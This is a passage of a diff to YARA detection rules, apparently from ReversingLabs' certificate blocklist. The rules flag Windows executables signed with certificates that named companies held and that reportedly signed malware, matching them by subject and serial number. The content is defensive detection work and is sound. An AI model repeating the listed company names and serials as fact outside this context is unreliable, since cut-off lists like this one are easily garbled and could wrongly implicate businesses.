"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5636-L5652" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc" score = 75 quality = 90 tags = "INFO, FILE" @@ -16337,22 +36128,22 @@ rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pak El AB" and (pe.signatures[i].serial=="00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures[i].serial=="a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2") and 1673395200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures[i].serial=="13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c" + id = "4696fc12-16b7-575f-b90f-aa0a5cc12852" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11632-L11648" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5654-L5672" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd" score = 75 quality = 90 tags = "INFO, FILE" @@ -16362,22 +36153,22 @@ rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures[i].serial=="62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THREE D CORPORATION PTY LTD" and (pe.signatures[i].serial=="00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures[i].serial=="d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9") and 1597622400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223" + id = "52b11933-f22c-53ea-88b7-75b3242907dd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11650-L11666" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5674-L5690" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22" score = 75 quality = 90 tags = "INFO, FILE" @@ -16387,22 +36178,22 @@ rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VENS CORP" and pe.signatures[i].serial=="34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tramplink LLC" and pe.signatures[i].serial=="5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7" + id = "29b1803e-90ee-5390-9548-20b24a3de218" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11668-L11684" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5692-L5710" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2" score = 75 quality = 90 tags = "INFO, FILE" @@ -16412,22 +36203,22 @@ rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Dibies" and pe.signatures[i].serial=="08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VESNA, OOO" and (pe.signatures[i].serial=="00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures[i].serial=="e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e") and 1600786458<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "135d638c-9ee5-52cf-a6e7-c12e4feef594" + id = "1adc776c-1549-5149-bd2f-81920a8d7255" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11686-L11704" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5712-L5730" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d" score = 75 quality = 90 tags = "INFO, FILE" @@ -16437,22 +36228,22 @@ rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Vertical" and (pe.signatures[i].serial=="00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures[i].serial=="c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62") and 1602201600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and (pe.signatures[i].serial=="00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures[i].serial=="8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63") and 1570626662<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "80e92980-f4eb-5ac2-9f68-14c352758791" + id = "dc8f49b8-fda2-510c-8374-3261e75d11a9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11706-L11722" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5732-L5750" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6" score = 75 quality = 90 tags = "INFO, FILE" @@ -16462,22 +36253,22 @@ rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CODE - HANDLE, s. r. o." and pe.signatures[i].serial=="54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Workstage Limited" and (pe.signatures[i].serial=="00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures[i].serial=="ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0") and 1567123200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7" + id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11724-L11742" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5752-L5768" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d" score = 75 quality = 90 tags = "INFO, FILE" @@ -16487,22 +36278,22 @@ rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Mikael LLC" and (pe.signatures[i].serial=="00:8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" or pe.signatures[i].serial=="8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81") and 1613088000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CHOO FSP, LLC" and pe.signatures[i].serial=="03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "180f1209-7031-50fb-b1fc-3d357f2b73a1" + id = "094a02ee-394b-5989-9f73-6b942aca5500" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11744-L11762" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e7a8f3dff77121df53d5f932f861e15208b0607ba77712f40927bc14b17a53cd" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5770-L5786" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f" score = 75 quality = 90 tags = "INFO, FILE" @@ -16512,22 +36303,22 @@ rule REVERSINGLABS_Cert_Blocklist_984E84Cfe362E278F558E2C70Aaafac2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and (pe.signatures[i].serial=="00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures[i].serial=="98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2") and 1640304000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MADAS d.o.o." and pe.signatures[i].serial=="07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "acd29c6d-27ed-587a-b17c-989e69082434" + id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11764-L11782" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5788-L5804" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c" score = 75 quality = 90 tags = "INFO, FILE" @@ -16537,22 +36328,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TASK ANNA LIMITED" and (pe.signatures[i].serial=="00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures[i].serial=="ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6") and 1647388800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "K & D KOMPANI d.o.o." and pe.signatures[i].serial=="0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1484a28d-ce7c-506f-8cbb-73ac541a0907" + id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11784-L11802" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5806-L5822" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255" score = 75 quality = 90 tags = "INFO, FILE" @@ -16562,22 +36353,22 @@ rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AATB ApS" and (pe.signatures[i].serial=="00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures[i].serial=="84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0") and 1616457600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAT11 d.o.o." and pe.signatures[i].serial=="01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "eb441b57-0f28-5609-b987-157e1f026b0c" + id = "a4432990-8c2f-523c-8a9d-cba578aaefc5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11804-L11822" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5824-L5842" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e" score = 75 quality = 90 tags = "INFO, FILE" @@ -16587,22 +36378,22 @@ rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Merkuri LLC" and (pe.signatures[i].serial=="00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures[i].serial=="b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c") and 1619568000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b" or pe.signatures[i].serial=="56:9e:03:98:8a:f6:0d:80:ce:60:72:89:40:85:0d:9b") and 1601006510<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_418F6D959A8A0F82Bef07Ceba3603E52 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8a8decfe-c91a-562c-9376-462cab598373" + id = "ecfb72ef-04c4-55b6-b9e0-e95053e03425" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11824-L11840" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5844-L5862" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6c13c5e85d6e053319193d1d94f216eeec64405c86d15971419078a1ce6c8ac9" score = 75 quality = 90 tags = "INFO, FILE" @@ -16612,22 +36403,22 @@ rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HELP, d.o.o." and pe.signatures[i].serial=="6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52" or pe.signatures[i].serial=="41:8f:6d:95:9a:8a:0f:82:be:f0:7c:eb:a3:60:3e:52") and 1601928240<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5378C5Bbeba0D3309A35Bb47F63037F7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8ec25296-2e51-53ec-a2f5-a25961079c27" + id = "7f367505-d7c1-5b8c-83bd-df3fec789d12" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11842-L11860" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5864-L5882" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a96acf93ca6da4d3bf5177b51996825cd3ea70443577622deccdd11fde579c31" score = 75 quality = 90 tags = "INFO, FILE" @@ -16637,22 +36428,22 @@ rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AXIUM NORTHWESTERN HYDRO INC." and (pe.signatures[i].serial=="00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures[i].serial=="aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42") and 1639872000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OORT inc." and (pe.signatures[i].serial=="00:53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7" or pe.signatures[i].serial=="53:78:c5:bb:eb:a0:d3:30:9a:35:bb:47:f6:30:37:f7") and 1601427420<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Bab6A2Aa84B495D9E554A4C42C0126D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8" + id = "7b6d364c-3e27-5314-b604-d44bb408fc4e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11862-L11878" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5884-L5900" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18" score = 75 quality = 90 tags = "INFO, FILE" @@ -16662,22 +36453,22 @@ rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO SMART" and pe.signatures[i].serial=="3c:98:b6:87:2f:bb:1f:4a:e3:7a:4c:aa:74:9d:24:c2" and 1613370100<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : 